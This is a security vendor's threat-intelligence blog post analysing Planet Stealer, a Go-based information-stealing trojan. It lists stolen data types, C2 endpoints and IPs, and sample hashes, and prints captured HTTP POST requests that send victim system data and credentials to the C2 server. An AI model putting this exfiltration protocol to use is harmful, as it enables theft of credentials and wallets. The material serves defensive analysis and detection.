Blog

Around We Go: Planet Stealer Emerges

By: Darren Spruell
March 7, 2024

Recent discussion around an emerging information-stealing trojan project reinforces the continual need to track intelligence on capabilities adversaries rely on for the collection of sensitive information from victims. In today’s blog InQuest analysts share information that has been publicly documented recently about the newer threat named Planet Stealer, recently offered for sale in underground forums.

Planet Stealer

A/K/A

  • PlanetStealer

Overview

Planet is an information stealing (stealer) trojan implemented in Go. The purpose of these types of malware is to collect and exfiltrate sensitive information from victim hosts where the threat actor has gained an initial foothold. Information stealers make up a large portion of the malware-as-a-service (MaaS) ecosystem today (malware offered as a service offering, often with hosted control panels and support from threat actors), making them attractive to many financially motivated adversaries wishing to acquire data from users for later use or sale.

There are many information-stealing malware families on the underground market, indicating demand from criminal communities to find dominant stealers to harvest credentials and data from end users.

References

Actors

One or more active threat actors have utilized Planet in recent campaigns. Reported samples have been distributed as EXE files, with at least one appearing to be distributed as a payload from a loader trojan. An active command & control (C2) server has been noted as common among samples, potentially used by a single threat actor or potentially as core infrastructure by the malware seller.

Capabilities

In forum advertisements, the seller has advertised several capabilities, mostly common among this class of malware.

  • Browser information theft
    • Chromium and Gecko browsers
    • Target data: cookies, session data, credentials
  • Cryptocurrency wallet theft
  • Messenger and game client credential theft
  • T1497 Virtualization/Sandbox Evasion
  • Telegram exfiltration

InQuest has observed that some behavioral sandbox reports have not captured complete analysis results including network communication details from analyzed samples, potentially supporting the functionality of implemented sandbox evasion features. As a newer project in the malware space, it is likely that implemented features are not advanced and future defense evasion measures will become more advanced in this stealer family.

C2

  • Telegram
    • Exfiltration via the Telegram messaging service is advertised. This is a somewhat common data exfiltration technique used by information stealing malware.
  • HTTP (POST)
    • Communication with the C2 server is implemented using an HTTP API with inner JSON data. Analysis of the C2 servers indicates a likely modern Python ASGI-based service using the Uvicorn app server on the backend, coupled with the FastAPI API library.
    • Main endpoints:
    • /submit/info
      • Initial check-in and bot registration
    • /submit/file
      • Data exfiltration (ZIP file upload containing collected data)
  • Observed request header:
    • User-Agent: Go-http-client/1.1
  • Observed response header:
    • Server: uvicorn
  • hXXp://hzp02itt0a[.]com/submit/info
  • hXXp://hzp02itt0a[.]com/submit/error
  • hXXp://193.178.170[.]30/submit/info
  • hXXp://193.178.170[.]30/submit/file
  • 193.178.170.30   AS48282 | RU | VDSINA-AS
    • 193.178.170.0/24 | RU | RU-VDSINA-20191118
      • ORG-HTL17-RIPE | RU | Hosting Technology LTD

Observed C2 request data, initial check-in (h/t ANY.RUN):

POST /submit/info HTTP/1.1
Host: 193.178.170.30
User-Agent: Go-http-client/1.1
Content-Length: 601
Content-Type: application/json
Accept-Encoding: gzip

{"owner_id":"65c2806e786bc1a62d5425d3","bot_id":"GQHQf1zL","build_id":"SEfFEjMJ","statistics":{"total_passwords":1,"total_cookies":25,"total_cards":0,"total_autofills":0,"total_wallets":0,"total_bookmarks":0},"computer":{"username":"admin","hostname":"DESKTOP-JGLLJLD","hwid":"bb926e54-e3ca-40fd-ae90-2764341e7792","cpu":"Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz","gpu":"Microsoft Basic Display Adapter","windows_version":"Windows 10 Pro","country":"DE","ip":"181.214.173.146"},"wallets":null,"credentials":[{"url":"https://google.com","username":"admin","password":"admin"}],"software":null,"file":""}

Formatted JSON data:

{

  "owner_id": "65c2806e786bc1a62d5425d3",
  "bot_id": "GQHQf1zL",
  "build_id": "SEfFEjMJ",
  "statistics": {
    "total_passwords": 1,
    "total_cookies": 25,
    "total_cards": 0,
    "total_autofills": 0,
    "total_wallets": 0,
    "total_bookmarks": 0
  },
  "computer": {
    "username": "admin",
    "hostname": "DESKTOP-JGLLJLD",
    "hwid": "bb926e54-e3ca-40fd-ae90-2764341e7792",
    "cpu": "Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz",
    "gpu": "Microsoft Basic Display Adapter",
    "windows_version": "Windows 10 Pro",
    "country": "DE",
    "ip": "181.214.173.146"
  },
  "wallets": null,
  "credentials": [
    {
      "url": "https://google.com",
      "username": "admin",
      "password": "admin"
    }
  ],
  "software": null,
  "file": ""
}

Response data:

HTTP/1.1 200 OK
date: Sun, 03 Mar 2024 15:02:24 GMT
server: uvicorn
content-length: 66
content-type: application/json
{"success":true,"callback":"cc081a61-1139-4400-934e-adfed816b758"}

Observed C2 request data, ZIP archive for data exfiltration:

POST /submit/file HTTP/1.1
Host: 193.178.170.30
User-Agent: Go-http-client/1.1
Content-Length: 2741
Content-Type: multipart/form-data; boundary=cbe1fe5aa3aa4a494e7fb583fd949208356f9b3354504b7733997d4ddd71
Accept-Encoding: gzip
--cbe1fe5aa3aa4a494e7fb583fd949208356f9b3354504b7733997d4ddd71
Content-Disposition: form-data; name="file"; filename="C:\\Users\\admin\\AppData\\Local\\Temp\\GQHQf1zL-cc081a61-1139-4400-934e-adfed816b758.zip"
Content-Type: application/octet-stream
PK......[redacted]

Response data:

HTTP/1.1 200 OK
date: Sun, 03 Mar 2024 15:02:24 GMT
server: uvicorn
content-length: 16
content-type: application/json
{"success":true}

Samples

HashNotes
7e33dd313ed09a15c81af55ee0997031caa3da8fba8c31c3859bc95e52559ff3Planet Stealer (2024-02-11)
2781.exe
UPX packed
[report] [report]
beb1e444d4a7e27ca6cb5fe55e9eaa3ecf880c044755d72f7724e7fea8371cd5Planet Stealer (2024-02-13)
tree.exe
UPX packed
[report] [report] [sample]
c90d23214088641431d2a93b6e3dfa26e6f5149bc8028449b7ce2f8edb2a6dd3Planet Stealer (2024-03-03)
c90d2.exe
UPX packed
[suyog41 2024-03]
[report] [report] [report] [report] [sample]
e846d3cfad85b09f8fdb0460fff53cfda1176f4e9e420bf60ed88d39b1ef93dbPlanet Stealer (2024-03-04)
PumJ9jkB.exe
UPX packed
[report] [report] [report] [sample]

Miscellaneous notes

  • The malware is implemented in Go, a modern compiled language
  • Planet Stealer has been distributed using other threats:
  • Advertised on underground forums (advertisements posted 2024-03-03):
    • BreachForums 2
    • Hack Forums
  • Presence on messaging services:
    • Telegram

InQuest credits open source intelligence surrounding disclosure of this stealer project to contributors listed in the References section and file sample notes. Thank you!

For in-depth information on another stealer trojan in reporting from InQuest and Zscaler, refer to Mystic Stealer: The New Kid on the Block.

Countermeasures

The use of a network-based instrumentation system that provides NetFlow-like metadata generation as well as DNS protocol capture and instrumentation in conjunction with a platform that can apply near real-time Threat Intelligence against this data serves as a basic control for detection, investigation, and response for malware attacks like Planet stealer.  Additional capabilities can be deployed to focus on interception and instrumentation of HTTP/HTTPS traffic either via web proxy (ICAP) or other means to ensure that your detection domain extends to the protocol level that this threat (and others) leverage for C2.  These three main foundational capabilities of network-based detection can provide any enterprise with a fighting chance against identifying, investigating, and then actioning against threats like these now and in the future. 

InQuest’s NetTAC platform provides these capabilities and more to its users and leverages our own highly validated InQuest InSights threat intelligence feeds, which provide global situational awareness into the threat landscape to stop emerging threats from exploiting your users.  Please visit https://inquest.net/products/nettac/ for more information.

in-the-wildthreat huntingthreat intelligence
About the Author

Darren Spruell

Chief Intelligence Officer
Darren Spruell leads threat intelligence efforts at InQuest. Darren’s career includes specialties in several areas of cybersecurity, including security engineering, incident response, malware analysis, threat research and cyber threat intelligence. He has experience both contributing to and leading teams in multiple industry sectors, including healthcare, education, financial, defense and manufacturing, and has worked in small companies, large enterprises, managed service providers and specialized security vendors. Darren has authored reports and spoken at security conferences on less mainstream topics such as monitoring passive network intrusion sensors, detecting and responding to malicious traffic distribution, the rise of web payment card skimmers, and large scale mobile and Linux botnet distribution operations.
More about this author
Back to Blog

InQuest, LLC
1204 San Antonio St, 2nd Floor
Austin, Texas 78701, USA

Phone
+1 (866) 982-0561

Web Support
support.inquest.net

Support
support@inquest.net

Sales
sales@inquest.net

PGP Key
inquest.pgp

© Copyright 2024 InQuest